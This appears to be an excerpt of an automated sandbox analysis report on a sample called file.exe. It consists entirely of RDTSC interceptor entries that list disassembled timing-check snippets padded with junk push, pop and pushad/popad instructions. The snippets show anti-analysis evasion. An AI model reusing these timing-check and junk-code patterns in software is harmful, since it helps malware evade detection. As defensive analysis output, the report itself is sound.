                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5130F second address: F51319 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51319 second address: F51329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC220745DFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51329 second address: F5132F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5132F second address: F51334 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD15A second address: EFD1CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jne 00007FC221A94B26h 0x00000010 pop esi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 adc cx, 5E73h 0x0000001a push 00000004h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FC221A94B28h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov di, B7B8h 0x0000003a mov edx, dword ptr [ebp+122D2B46h] 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jns 00007FC221A94B3Bh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F515DA second address: F515DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51F7F second address: F51F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51F84 second address: F51F9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC220745E02h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58D92 second address: F58DA0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DA0 second address: F58DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DA6 second address: F58DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DAA second address: F58DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DB8 second address: F58DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC221A94B30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F593E6 second address: F593EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F593EA second address: F59414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC221A94B26h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59414 second address: F59439 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FC220745DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC220745E09h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59439 second address: F5943F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5943F second address: F59443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596D6 second address: F596DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F596DC second address: F596E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F10 second address: F59F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC221A94B26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC221A94B26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F25 second address: F59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F29 second address: F59F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jno 00007FC221A94B32h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59F47 second address: F59F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A528 second address: F5A53A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC221A94B2Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A53A second address: F5A53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5AAEE second address: F5AAFD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C3B4 second address: F5C3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FC220745DF6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F601B0 second address: F601B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F601B6 second address: F601D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FC220745DF6h 0x00000015 popad 0x00000016 jmp 00007FC220745DFAh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F6F0 second address: F5F707 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC221A94B32h 0x00000008 jg 00007FC221A94B26h 0x0000000e jne 00007FC221A94B26h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F707 second address: F5F711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F711 second address: F5F724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FC221A94B26h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F724 second address: F5F73C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC220745E02h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F885 second address: F5F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FC221A94B31h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FCA9 second address: F5FCF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC220745E05h 0x0000000a jmp 00007FC220745E06h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC220745E0Bh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FCF9 second address: F5FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FE43 second address: F5FE63 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jno 00007FC220745DFEh 0x00000010 jo 00007FC220745DFCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64996 second address: F649B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC221A94B37h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F66027 second address: F66043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFBh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FC220745DF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F66043 second address: F66047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6C3CE second address: F6C3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC220745E03h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6C3E9 second address: F6C3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6C58B second address: F6C591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6C591 second address: F6C595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6CC13 second address: F6CC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6D375 second address: F6D379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6D379 second address: F6D38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC220745DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6D9F6 second address: F6DA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F6DA04 second address: F6DA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC220745DF6h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F74BB0 second address: F74BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC221A94B26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F74BBA second address: F74BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F74BBE second address: F74BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC221A94B35h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F74BDE second address: F74BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F818C4 second address: F818C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F81492 second address: F8149F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8149F second address: F814AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F814AB second address: F814AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F814AF second address: F814B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F83D78 second address: F83DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E03h 0x00000009 pop edi 0x0000000a push edi 0x0000000b jmp 00007FC220745DFFh 0x00000010 jbe 00007FC220745DF6h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8AEB6 second address: F8AEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8AEC2 second address: F8AEE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC220745DFCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC220745E18h 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FC220745DF6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8AEE8 second address: F8AEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8AEEC second address: F8AEF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F973C9 second address: F973CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9A879 second address: F9A87D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FA01FF second address: FA0205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9ED30 second address: F9ED35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9EFD5 second address: F9F01B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC221A94B40h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B33h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F01B second address: F9F03A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F03A second address: F9F040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F040 second address: F9F044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F044 second address: F9F04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F04A second address: F9F068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745E08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F068 second address: F9F06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F317 second address: F9F31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F31B second address: F9F32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c jnp 00007FC221A94B26h 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F9F5D8 second address: F9F5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC220745DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FA3EBE second address: FA3EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FA3EC2 second address: FA3ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FA3ECA second address: FA3ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FBD345 second address: FBD363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E07h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCE7CF second address: FCE7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC221A94B36h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC221A94B2Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCE7FA second address: FCE802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF1D6 second address: FCF1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF4C8 second address: FCF4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF4D7 second address: FCF4DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF4DB second address: FCF4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC220745DF6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF4E9 second address: FCF4F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FC221A94B26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FCF4F9 second address: FCF510 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC220745DFDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD0DE7 second address: FD0E2A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC221A94B37h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B38h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD24DB second address: FD24F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD4E2C second address: FD4E36 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD4E36 second address: FD4E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD4E3C second address: FD4E4F instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD4E4F second address: FD4E55 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD5150 second address: FD5159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD539D second address: FD53A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD53A4 second address: FD53AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: FD53AA second address: FD53AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
